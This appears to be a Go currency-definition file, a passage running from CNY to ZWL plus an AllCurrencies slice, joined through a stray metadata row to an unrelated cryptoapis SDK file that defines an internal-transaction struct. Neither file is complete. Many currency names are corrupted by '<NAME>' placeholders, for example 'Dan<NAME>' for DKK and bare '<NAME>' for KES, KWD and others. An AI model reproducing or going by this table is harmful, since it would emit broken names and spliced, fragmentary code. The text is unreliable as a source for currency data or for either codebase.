CNY = Currency{Name: "Chinese Renminbi Yuan", IsoCode: "CNY", Symbol: "¥", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
COP = Currency{Name: "Colombian Peso", IsoCode: "COP", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
CRC = Currency{Name: "Costa Rican Colón", IsoCode: "CRC", Symbol: "₡", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
CUC = Currency{Name: "Cuban Convertible Peso", IsoCode: "CUC", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
CUP = Currency{Name: "Cuban Peso", IsoCode: "CUP", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
CVE = Currency{Name: "Cape Verdean Escudo", IsoCode: "CVE", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
CZK = Currency{Name: "Czech Koruna", IsoCode: "CZK", Symbol: "Kč", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ' ', DecimalMark: ','}
DJF = Currency{Name: "Djiboutian Franc", IsoCode: "DJF", Symbol: "Fdj", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
DKK = Currency{Name: "Dan<NAME>", IsoCode: "DKK", Symbol: "kr.", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
DOP = Currency{Name: "Dominican Peso", IsoCode: "DOP", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
DZD = Currency{Name: "Algerian Dinar", IsoCode: "DZD", Symbol: "د.ج", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
EEK = Currency{Name: "Estonian Kroon", IsoCode: "EEK", Symbol: "KR", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
EGP = Currency{Name: "Egyptian Pound", IsoCode: "EGP", Symbol: "ج.م", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ERN = Currency{Name: "Eritrean Nakfa", IsoCode: "ERN", Symbol: "Nfk", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ETB = Currency{Name: "Ethiopian Birr", IsoCode: "ETB", Symbol: "Br", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
EUR = Currency{Name: "Euro", IsoCode: "EUR", Symbol: "€", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
FJD = Currency{Name: "Fijian Dollar", IsoCode: "FJD", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
FKP = Currency{Name: "Falkland Pound", IsoCode: "FKP", Symbol: "£", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GBP = Currency{Name: "British Pound", IsoCode: "GBP", Symbol: "£", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GBX = Currency{Name: "British Penny", IsoCode: "GBX", Symbol: "", SymbolFirst: true, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
GEL = Currency{Name: "Georgian Lari", IsoCode: "GEL", Symbol: "ლ", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GGP = Currency{Name: "Guernsey Pound", IsoCode: "GGP", Symbol: "£", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GHS = Currency{Name: "Ghanaian Cedi", IsoCode: "GHS", Symbol: "₵", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GIP = Currency{Name: "Gibraltar Pound", IsoCode: "GIP", Symbol: "£", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GMD = Currency{Name: "Gambian Dalasi", IsoCode: "GMD", Symbol: "D", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GNF = Currency{Name: "Guinean Franc", IsoCode: "GNF", Symbol: "Fr", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
GTQ = Currency{Name: "Guatemalan Quetzal", IsoCode: "GTQ", Symbol: "Q", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GYD = Currency{Name: "Guyanese Dollar", IsoCode: "GYD", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
HKD = Currency{Name: "Hong Kong Dollar", IsoCode: "HKD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
HNL = Currency{Name: "Honduran Lempira", IsoCode: "HNL", Symbol: "L", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
HRK = Currency{Name: "Croatian Kuna", IsoCode: "HRK", Symbol: "kn", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
HTG = Currency{Name: "Haitian Gourde", IsoCode: "HTG", Symbol: "G", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
HUF = Currency{Name: "Hungarian Forint", IsoCode: "HUF", Symbol: "Ft", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ' ', DecimalMark: ','}
IDR = Currency{Name: "Indonesian Rupiah", IsoCode: "IDR", Symbol: "Rp", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
ILS = Currency{Name: "Israeli New Sheqel", IsoCode: "ILS", Symbol: "₪", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
IMP = Currency{Name: "Isle of Man Pound", IsoCode: "IMP", Symbol: "£", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
INR = Currency{Name: "Indian Rupee", IsoCode: "INR", Symbol: "₹", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
IQD = Currency{Name: "Iraqi Dinar", IsoCode: "IQD", Symbol: "ع.د", SymbolFirst: false, SubunitToUnit: 1000, ThousandsSeparator: ',', DecimalMark: '.'}
IRR = Currency{Name: "Iranian Rial", IsoCode: "IRR", Symbol: "﷼", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ISK = Currency{Name: "Icelandic Króna", IsoCode: "ISK", Symbol: "kr", SymbolFirst: true, SubunitToUnit: 1, ThousandsSeparator: '.', DecimalMark: ','}
JEP = Currency{Name: "Jersey Pound", IsoCode: "JEP", Symbol: "£", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
JMD = Currency{Name: "Jamaican Dollar", IsoCode: "JMD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
JOD = Currency{Name: "Jordanian Dinar", IsoCode: "JOD", Symbol: "د.ا", SymbolFirst: true, SubunitToUnit: 1000, ThousandsSeparator: ',', DecimalMark: '.'}
JPY = Currency{Name: "Japanese Yen", IsoCode: "JPY", Symbol: "¥", SymbolFirst: true, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
KES = Currency{Name: "<NAME>", IsoCode: "KES", Symbol: "KSh", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
KGS = Currency{Name: "<NAME>", IsoCode: "KGS", Symbol: "som", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
KHR = Currency{Name: "<NAME>", IsoCode: "KHR", Symbol: "៛", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
KMF = Currency{Name: "Comorian Franc", IsoCode: "KMF", Symbol: "Fr", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
KPW = Currency{Name: "North Korean Won", IsoCode: "KPW", Symbol: "₩", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
KRW = Currency{Name: "South Korean Won", IsoCode: "KRW", Symbol: "₩", SymbolFirst: true, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
KWD = Currency{Name: "<NAME>", IsoCode: "KWD", Symbol: "د.ك", SymbolFirst: true, SubunitToUnit: 1000, ThousandsSeparator: ',', DecimalMark: '.'}
KYD = Currency{Name: "Cayman Islands Dollar", IsoCode: "KYD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
KZT = Currency{Name: "<NAME>", IsoCode: "KZT", Symbol: "₸", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LAK = Currency{Name: "L<NAME>", IsoCode: "LAK", Symbol: "₭", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LBP = Currency{Name: "Lebanese Pound", IsoCode: "LBP", Symbol: "ل.ل", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LKR = Currency{Name: "Sri Lankan Rupee", IsoCode: "LKR", Symbol: "₨", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LRD = Currency{Name: "Liberian Dollar", IsoCode: "LRD", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LSL = Currency{Name: "<NAME>", IsoCode: "LSL", Symbol: "L", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LTL = Currency{Name: "Lithuanian Litas", IsoCode: "LTL", Symbol: "Lt", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LVL = Currency{Name: "Latvian Lats", IsoCode: "LVL", Symbol: "Ls", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LYD = Currency{Name: "<NAME>", IsoCode: "LYD", Symbol: "ل.د", SymbolFirst: false, SubunitToUnit: 1000, ThousandsSeparator: ',', DecimalMark: '.'}
MAD = Currency{Name: "<NAME>", IsoCode: "MAD", Symbol: "د.م.", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MDL = Currency{Name: "<NAME>", IsoCode: "MDL", Symbol: "L", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MGA = Currency{Name: "<NAME>", IsoCode: "MGA", Symbol: "Ar", SymbolFirst: true, SubunitToUnit: 5, ThousandsSeparator: ',', DecimalMark: '.'}
MKD = Currency{Name: "<NAME>", IsoCode: "MKD", Symbol: "ден", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MMK = Currency{Name: "<NAME>", IsoCode: "MMK", Symbol: "K", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MNT = Currency{Name: "Mongol<NAME>", IsoCode: "MNT", Symbol: "₮", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MOP = Currency{Name: "<NAME>", IsoCode: "MOP", Symbol: "P", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MRO = Currency{Name: "<NAME>", IsoCode: "MRO", Symbol: "UM", SymbolFirst: false, SubunitToUnit: 5, ThousandsSeparator: ',', DecimalMark: '.'}
MTL = Currency{Name: "<NAME>", IsoCode: "MTL", Symbol: "₤", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MUR = Currency{Name: "Mauritian Rupee", IsoCode: "MUR", Symbol: "₨", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MVR = Currency{Name: "Maldivian Rufiyaa", IsoCode: "MVR", Symbol: "MVR", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MWK = Currency{Name: "Malawian Kwacha", IsoCode: "MWK", Symbol: "MK", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MXN = Currency{Name: "Mexican Peso", IsoCode: "MXN", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MYR = Currency{Name: "Malaysian Ringgit", IsoCode: "MYR", Symbol: "RM", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MZN = Currency{Name: "Mozambican Metical", IsoCode: "MZN", Symbol: "MTn", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
NAD = Currency{Name: "Namibian Dollar", IsoCode: "NAD", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
NGN = Currency{Name: "Nigerian Naira", IsoCode: "NGN", Symbol: "₦", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
NIO = Currency{Name: "Nicaraguan Córdoba", IsoCode: "NIO", Symbol: "C$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
NOK = Currency{Name: "Norwegian Krone", IsoCode: "NOK", Symbol: "kr", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
NPR = Currency{Name: "Nepalese Rupee", IsoCode: "NPR", Symbol: "₨", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
NZD = Currency{Name: "New Zealand Dollar", IsoCode: "NZD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
OMR = Currency{Name: "Omani Rial", IsoCode: "OMR", Symbol: "ر.ع.", SymbolFirst: true, SubunitToUnit: 1000, ThousandsSeparator: ',', DecimalMark: '.'}
PAB = Currency{Name: "Panamanian Balboa", IsoCode: "PAB", Symbol: "B/.", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
PEN = Currency{Name: "Peruvian Sol", IsoCode: "PEN", Symbol: "S/", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
PGK = Currency{Name: "Papua New Guinean Kina", IsoCode: "PGK", Symbol: "K", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
PHP = Currency{Name: "Philippine Peso", IsoCode: "PHP", Symbol: "₱", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
PKR = Currency{Name: "Pakistani Rupee", IsoCode: "PKR", Symbol: "₨", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
PLN = Currency{Name: "Polish Złoty", IsoCode: "PLN", Symbol: "zł", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ' ', DecimalMark: ','}
PYG = Currency{Name: "Paraguayan Guaraní", IsoCode: "PYG", Symbol: "₲", SymbolFirst: true, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
QAR = Currency{Name: "Qatari Riyal", IsoCode: "QAR", Symbol: "ر.ق", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
RON = Currency{Name: "Romanian Leu", IsoCode: "RON", Symbol: "Lei", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
RSD = Currency{Name: "Serbian Dinar", IsoCode: "RSD", Symbol: "РСД", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
RUB = Currency{Name: "Russian Ruble", IsoCode: "RUB", Symbol: "₽", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
RWF = Currency{Name: "Rwandan Franc", IsoCode: "RWF", Symbol: "FRw", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
SAR = Currency{Name: "Saudi Riyal", IsoCode: "SAR", Symbol: "ر.س", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SBD = Currency{Name: "Solomon Islands Dollar", IsoCode: "SBD", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SCR = Currency{Name: "Seychellois Rupee", IsoCode: "SCR", Symbol: "₨", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SDG = Currency{Name: "Sudanese Pound", IsoCode: "SDG", Symbol: "£", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SEK = Currency{Name: "Swedish Krona", IsoCode: "SEK", Symbol: "kr", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ' ', DecimalMark: ','}
SGD = Currency{Name: "Singapore Dollar", IsoCode: "SGD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SHP = Currency{Name: "Saint Helenian Pound", IsoCode: "SHP", Symbol: "£", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SKK = Currency{Name: "Slovak Koruna", IsoCode: "SKK", Symbol: "Sk", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SLL = Currency{Name: "Sierra Leonean Leone", IsoCode: "SLL", Symbol: "Le", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SOS = Currency{Name: "Somali Shilling", IsoCode: "SOS", Symbol: "Sh", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SRD = Currency{Name: "Surinamese Dollar", IsoCode: "SRD", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SSP = Currency{Name: "South Sudanese Pound", IsoCode: "SSP", Symbol: "£", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
STD = Currency{Name: "São Tomé and Pr<NAME>", IsoCode: "STD", Symbol: "Db", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SVC = Currency{Name: "Salvadoran Colón", IsoCode: "SVC", Symbol: "₡", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SYP = Currency{Name: "<NAME>", IsoCode: "SYP", Symbol: "£S", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SZL = Currency{Name: "Swazi Lilangeni", IsoCode: "SZL", Symbol: "E", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
THB = Currency{Name: "<NAME>", IsoCode: "THB", Symbol: "฿", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
TJS = Currency{Name: "T<NAME>", IsoCode: "TJS", Symbol: "ЅМ", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
TMT = Currency{Name: "Turkmenistani Manat", IsoCode: "TMT", Symbol: "T", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
TND = Currency{Name: "Tunisian Dinar", IsoCode: "TND", Symbol: "د.ت", SymbolFirst: false, SubunitToUnit: 1000, ThousandsSeparator: ',', DecimalMark: '.'}
TOP = Currency{Name: "Tongan Paʻanga", IsoCode: "TOP", Symbol: "T$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
TRY = Currency{Name: "Turkish Lira", IsoCode: "TRY", Symbol: "₺", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
TTD = Currency{Name: "Trinidad and Tobago Dollar", IsoCode: "TTD", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
TWD = Currency{Name: "New Taiwan Dollar", IsoCode: "TWD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
TZS = Currency{Name: "Tanzanian Shilling", IsoCode: "TZS", Symbol: "Sh", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
UAH = Currency{Name: "Ukrainian Hryvnia", IsoCode: "UAH", Symbol: "₴", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
UGX = Currency{Name: "Ugandan Shilling", IsoCode: "UGX", Symbol: "USh", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
USD = Currency{Name: "United States Dollar", IsoCode: "USD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
UYU = Currency{Name: "Uruguayan Peso", IsoCode: "UYU", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
UZS = Currency{Name: "Uzbekistan Som", IsoCode: "UZS", Symbol: "so'm", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
VEF = Currency{Name: "<NAME>", IsoCode: "VEF", Symbol: "Bs.F", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
VES = Currency{Name: "<NAME>", IsoCode: "VES", Symbol: "Bs", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
VND = Currency{Name: "Vietname<NAME>", IsoCode: "VND", Symbol: "₫", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: '.', DecimalMark: ','}
VUV = Currency{Name: "<NAME>", IsoCode: "VUV", Symbol: "Vt", SymbolFirst: true, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
WST = Currency{Name: "<NAME>", IsoCode: "WST", Symbol: "T", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
XAF = Currency{Name: "Central African Cfa Franc", IsoCode: "XAF", Symbol: "Fr", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XAG = Currency{Name: "Silver (Troy Ounce)", IsoCode: "XAG", Symbol: "oz t", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XAU = Currency{Name: "Gold (Troy Ounce)", IsoCode: "XAU", Symbol: "oz t", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XBA = Currency{Name: "European Composite Unit", IsoCode: "XBA", Symbol: "", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XBB = Currency{Name: "European Monetary Unit", IsoCode: "XBB", Symbol: "", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XBC = Currency{Name: "European Unit of Account 9", IsoCode: "XBC", Symbol: "", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XBD = Currency{Name: "European Unit of Account 17", IsoCode: "XBD", Symbol: "", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XCD = Currency{Name: "East Caribbean Dollar", IsoCode: "XCD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
XDR = Currency{Name: "Special Drawing Rights", IsoCode: "XDR", Symbol: "SDR", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XFU = Currency{Name: "UIC Franc", IsoCode: "XFU", Symbol: "", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
XOF = Currency{Name: "West African Cfa Franc", IsoCode: "XOF", Symbol: "Fr", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XPD = Currency{Name: "Palladium", IsoCode: "XPD", Symbol: "oz t", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XPF = Currency{Name: "Cfp Franc", IsoCode: "XPF", Symbol: "Fr", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XPT = Currency{Name: "Platinum", IsoCode: "XPT", Symbol: "oz t", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
XTS = Currency{Name: "Codes specifically reserved for testing purposes", IsoCode: "XTS", Symbol: "", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
YER = Currency{Name: "Yemeni Rial", IsoCode: "YER", Symbol: "﷼", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ZAR = Currency{Name: "South African Rand", IsoCode: "ZAR", Symbol: "R", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ZMW = Currency{Name: "Zambian Kwacha", IsoCode: "ZMW", Symbol: "K", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ZWL = Currency{Name: "Zimbabwean Dollar", IsoCode: "ZWL", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
)
// A slice with all pre-defined currencies.
var AllCurrencies []Currency = []Currency{
AED,
AFN,
ALL,
AMD,
ANG,
AOA,
ARS,
AUD,
AWG,
AZN,
BAM,
BBD,
BCH,
BDT,
BGN,
BHD,
BIF,
BMD,
BND,
BOB,
BRL,
BSD,
BTC,
BTN,
BWP,
BYN,
BZD,
CAD,
CDF,
CHF,
CLF,
CLP,
CNH,
CNY,
COP,
CRC,
CUC,
CUP,
CVE,
CZK,
DJF,
DKK,
DOP,
DZD,
EEK,
EGP,
ERN,
ETB,
EUR,
FJD,
FKP,
GBP,
GBX,
GEL,
GGP,
GHS,
GIP,
GMD,
GNF,
GTQ,
GYD,
HKD,
HNL,
HRK,
HTG,
HUF,
IDR,
ILS,
IMP,
INR,
IQD,
IRR,
ISK,
JEP,
JMD,
JOD,
JPY,
KES,
KGS,
KHR,
KMF,
KPW,
KRW,
KWD,
KYD,
KZT,
LAK,
LBP,
LKR,
LRD,
LSL,
LTL,
LVL,
LYD,
MAD,
MDL,
MGA,
MKD,
MMK,
MNT,
MOP,
MRO,
MTL,
MUR,
MVR,
MWK,
MXN,
MYR,
MZN,
NAD,
NGN,
NIO,
NOK,
NPR,
NZD,
OMR,
PAB,
PEN,
PGK,
PHP,
PKR,
PLN,
PYG,
QAR,
RON,
RSD,
RUB,
RWF,
SAR,
SBD,
SCR,
SDG,
SEK,
SGD,
SHP,
SKK,
SLL,
SOS,
SRD,
SSP,
STD,
SVC,
SYP,
SZL,
THB,
TJS,
TMT,
TND,
TOP,
TRY,
TTD,
TWD,
TZS,
UAH,
UGX,
USD,
UYU,
UZS,
VEF,
VES,
VND,
VUV,
WST,
XAF,
XAG,
XAU,
XBA,
XBB,
XBC,
XBD,
XCD,
XDR,
XFU,
XOF,
XPD,
XPF,
XPT,
XTS,
YER,
ZAR,
ZMW,
ZWL,
} | currency.go | 0.608943 | 0.473901 | currency.go | starcoder |
package cryptoapis
import (
"encoding/json"
)
// ListInternalTransactionsByAddressRI struct for ListInternalTransactionsByAddressRI
type ListInternalTransactionsByAddressRI struct {
// Defines the specific amount of the transaction.
Amount string `json:"amount"`
// Represents the hash of the block where this transaction was mined/confirmed for first time. The hash is defined as a cryptographic digital fingerprint made by hashing the block header twice through the SHA256 algorithm.
MinedInBlockHash string `json:"minedInBlockHash"`
// Represents the hight of the block where this transaction was mined/confirmed for first time. The height is defined as the number of blocks in the blockchain preceding this specific block.
MinedInBlockHeight int32 `json:"minedInBlockHeight"`
// Represents the unique internal transaction ID in regards to the parent transaction (type trace address).
OperationID string `json:"operationID"`
// Defines the call type of the internal transaction.
OperationType string `json:"operationType"`
// Defines the specific hash of the parent transaction.
ParentHash string `json:"parentHash"`
// Represents the recipient address with the respective amount.
Recipient string `json:"recipient"`
// Represents the sender address with the respective amount.
Sender string `json:"sender"`
Timestamp int32 `json:"timestamp"`
}
// NewListInternalTransactionsByAddressRI instantiates a new ListInternalTransactionsByAddressRI object
// This constructor will assign default values to properties that have it defined,
// and makes sure properties required by API are set, but the set of arguments
// will change when the set of required properties is changed
func NewListInternalTransactionsByAddressRI(amount string, minedInBlockHash string, minedInBlockHeight int32, operationID string, operationType string, parentHash string, recipient string, sender string, timestamp int32) *ListInternalTransactionsByAddressRI {
this := ListInternalTransactionsByAddressRI{}
this.Amount = amount
this.MinedInBlockHash = minedInBlockHash
this.MinedInBlockHeight = minedInBlockHeight
this.OperationID = operationID
this.OperationType = operationType
this.ParentHash = parentHash
this.Recipient = recipient
this.Sender = sender
this.Timestamp = timestamp
return &this
}
// NewListInternalTransactionsByAddressRIWithDefaults instantiates a new ListInternalTransactionsByAddressRI object
// This constructor will only assign default values to properties that have it defined,
// but it doesn't guarantee that properties required by API are set
